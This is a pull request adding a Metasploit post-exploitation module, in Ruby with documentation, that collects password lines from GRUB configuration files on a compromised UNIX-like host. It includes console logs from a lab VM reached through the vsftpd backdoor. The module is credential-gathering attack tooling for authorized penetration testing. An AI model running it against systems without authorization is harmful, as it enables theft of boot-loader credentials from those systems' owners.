### PR TITLE
#11166 add gather grub passwords

### DIFF
--- a/documentation/modules/post/multi/gather/grub_creds.md
+++ b/documentation/modules/post/multi/gather/grub_creds.md
@@ -1,0 +1,94 @@
+# Gather GRUB Passwords
+
+Reads all passwords from GRUB configuration files on UNIX-like machines.
+
+## Vulnerable Application
+
+Any UNIX-like system with a `shell` or `meterpreter` session using GRUB.
+
+## Verification Steps
+
+  1. Get a `shell` or `meterpreter` session on some host.
+  2. Do: ```use post/multi/gather/grub_creds```
+  3. Do: ```set SESSION [SESSION_ID]```, replacing ```[SESSION_ID]``` with the
+     session number you wish to run this one.
+  4. Do: ```run```
+  5. If the system has readable GRUB configuration files containing a password,
+     they will be printed out.
+
+## Options
+
+**FILENAME**
+
+A string that can be used to specify an additional file to check after the
+usual places.
+
+**VERBOSE**
+
+A boolean that, when set, will provide more details on what is being checked.
+_(Note: this option is defined elsewhere in metasploit, but this module can make
+use of it.)_
+
+## Scenarios
+
+Using a Metasploitable 2 VM (running Ubuntu 8.04), you can add the line
+`password topscret` to `/boot/grub/menu.lst` if you want to see this module in
+action.
+
+## Shell
+
+```
+msf5 exploit(unix/ftp/vsftpd_234_backdoor) > use post/multi/gather/grub_creds
+msf5 post(multi/gather/grub_creds) > run
+[-] Post failed: Msf::OptionValidateError The following options failed to validate: SESSION.
+msf5 post(multi/gather/grub_creds) > set SESSION 1
+SESSION => 1
+msf5 post(multi/gather/grub_creds) > run
+
+[+] /boot/grub/menu.lst:password topsecret
+[*] Grub configuration files found and checked: 1.
+[*] Post module execution completed
+msf5 post(multi/gather/grub_creds) > set VERBOSE true
+VERBOSE => true
+msf5 post(multi/gather/grub_creds) > set FILENAME /root/grub.cfg
+FILENAME => /root/grub.cfg
+msf5 post(multi/gather/grub_creds) > run
+
+[*] Finding grub configuration files
+[*] Checking /boot/grub/grub.conf
+[*] /boot/grub/grub.conf not found or unreadable
+[*] Checking /boot/grub/grub.cfg
+[*] /boot/grub/grub.cfg not found or unreadable
+[*] Checking /boot/grub/menu.lst
+[+] /boot/grub/menu.lst:password topsecret
+[*] Checking /etc/grub.conf
+[*] /etc/grub.conf not found or unreadable
+[*] Checking /etc/grub/grub.cfg
+[*] /etc/grub/grub.cfg not found or unreadable
+[*] Checking /etc/grub.d/00_header
+[*] /etc/grub.d/00_header not found or unreadable
+[*] Checking /mnt/sysimage/boot/grub.conf
+[*] /mnt/sysimage/boot/grub.conf not found or unreadable
+[*] Checking /mnt/boot/grub/grub.conf
+[*] /mnt/boot/grub/grub.conf not found or unreadable
+[*] Checking /rpool/boot/grub/grub.cfg
+[*] /rpool/boot/grub/grub.cfg not found or unreadable
+[*] Checking /root/grub.cfg
+[*] /root/grub.cfg not found or unreadable
+[*] Grub configuration files found and checked: 1.
+[*] Post module execution completed
+msf5 post(multi/gather/grub_creds) >
+```
+
+### Meterpreter
+```
+msf5 exploit(unix/ftp/vsftpd_234_backdoor) > sessions 2
+[*] Starting interaction with 2...
+
+meterpreter > run post/multi/gather/grub_creds
+
+[+] /boot/grub/menu.lst:password topsecret
+[*] Grub configuration files found and checked: 1.
+meterpreter >
+```
+

--- a/modules/post/multi/gather/grub_creds.rb
+++ b/modules/post/multi/gather/grub_creds.rb
@@ -1,0 +1,82 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'           => 'Multi Gather Grub Password Collection',
+      'Description'    => %q(
+        This module will collect lines starting with "password" from known grub
+        configuration locations.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         => ['Taeber Rapczak <taeber@rapczak.com>'],
+      'Platform'       => %w[bsd linux unix],
+      'SessionTypes'   => %w[meterpreter shell]
+    ))
+
+    register_options(
+      [
+        OptString.new(
+          'FILENAME',
+          [false, 'Additional grub configuration filename.', '']
+        ),
+      ]
+    )
+
+    @files = %w[
+      /boot/grub/grub.conf
+      /boot/grub/grub.cfg
+      /boot/grub/menu.lst
+      /etc/grub.conf
+      /etc/grub/grub.cfg
+      /etc/grub.d/00_header
+      /mnt/sysimage/boot/grub.conf
+      /mnt/boot/grub/grub.conf
+      /rpool/boot/grub/grub.cfg
+    ]
+  end
+
+  def find_passwords(filename)
+    return if filename.to_s.strip.empty?
+
+    inform "Checking #{filename}"
+
+    if !readable? filename
+      inform "#{filename} not found or unreadable"
+      return
+    end
+
+    @found += 1
+
+    content = read_file filename
+    content = content.split "\n" if content.is_a? String
+    content.each do |line|
+      next unless line.start_with? 'password'
+
+      print_good "#{filename}:#{line}"
+    end
+  end
+
+  def run
+    @found = 0
+    inform 'Finding grub configuration files'
+
+    files = Array.[](*@files, datastore['FILENAME'])
+    files.each { |filename| find_passwords filename }
+
+    print_status "Grub configuration files found and checked: #{@found}."
+  end
+
+  private
+
+  def inform(message)
+    print_status message if datastore['VERBOSE']
+  end
+
+end


### PR DESCRIPTION
This change adds a  post module to collect passwords from GRUB configuration files.

It should fix #11166.

## Vulnerable Application

Any UNIX-like system with a `shell` or `meterpreter` session using GRUB.

## Verification Steps

  1. Get a `shell` or `meterpreter` session on some host.
  2. Do: ```use post/multi/gather/grub_creds```
  3. Do: ```set SESSION [SESSION_ID]```, replacing ```[SESSION_ID]``` with the session number you wish to run this one.
  4. Do: ```run```
  5. If the system has readable GRUB configuration files containing a password, they will be printed out.

## Options

  * `FILENAME` is a string that can be used to specify an additional file to check after the usual places.
  * `VERBOSE` is a boolean that, when set, will provide more details on what is being checked. (Note: this option is defined elsewhere in metasploit, but this module makes use of it.)

## Scenarios

I tested against a Metasploitable 2 VM (running Ubuntu 8.04). After adding the line
`password topscret` to `/boot/grub/menu.lst`, I ran the post-exploit.

```
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > use post/multi/gather/grub_creds 
msf5 post(multi/gather/grub_creds) > run
[-] Post failed: Msf::OptionValidateError The following options failed to validate: SESSION.
msf5 post(multi/gather/grub_creds) > set SESSION 1
SESSION => 1
msf5 post(multi/gather/grub_creds) > run

[+] /boot/grub/menu.lst:password topsecret
[*] Grub configuration files found and checked: 1.
[*] Post module execution completed
msf5 post(multi/gather/grub_creds) > set VERBOSE true
VERBOSE => true
msf5 post(multi/gather/grub_creds) > set FILENAME /root/grub.cfg
FILENAME => /root/grub.cfg
msf5 post(multi/gather/grub_creds) > run

[*] Finding grub configuration files
[*] Checking /boot/grub/grub.conf
[*] /boot/grub/grub.conf not found or unreadable
[*] Checking /boot/grub/grub.cfg
[*] /boot/grub/grub.cfg not found or unreadable
[*] Checking /boot/grub/menu.lst
[+] /boot/grub/menu.lst:password topsecret
[*] Checking /etc/grub.conf
[*] /etc/grub.conf not found or unreadable
[*] Checking /etc/grub/grub.cfg
[*] /etc/grub/grub.cfg not found or unreadable
[*] Checking /etc/grub.d/00_header
[*] /etc/grub.d/00_header not found or unreadable
[*] Checking /mnt/sysimage/boot/grub.conf
[*] /mnt/sysimage/boot/grub.conf not found or unreadable
[*] Checking /mnt/boot/grub/grub.conf
[*] /mnt/boot/grub/grub.conf not found or unreadable
[*] Checking /rpool/boot/grub/grub.cfg
[*] /rpool/boot/grub/grub.cfg not found or unreadable
[*] Checking /root/grub.cfg
[*] /root/grub.cfg not found or unreadable
[*] Grub configuration files found and checked: 1.
[*] Post module execution completed
msf5 post(multi/gather/grub_creds) > 
```

I also verified it works through meterpreter.
```
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > sessions 2
[*] Starting interaction with 2...

meterpreter > run post/multi/gather/grub_creds 

[+] /boot/grub/menu.lst:password topsecret
[*] Grub configuration files found and checked: 1.
meterpreter > 

```

## Standards

* I ran Rubocop on the code and verified there were no problems.
* msftidy reports `[INFO] No CVE references found. Please check before you land!` which I ignored since there is no CVE associated with this.
* Code is licensed under the MSF's license (BSD-3-clause).
* Documentation added.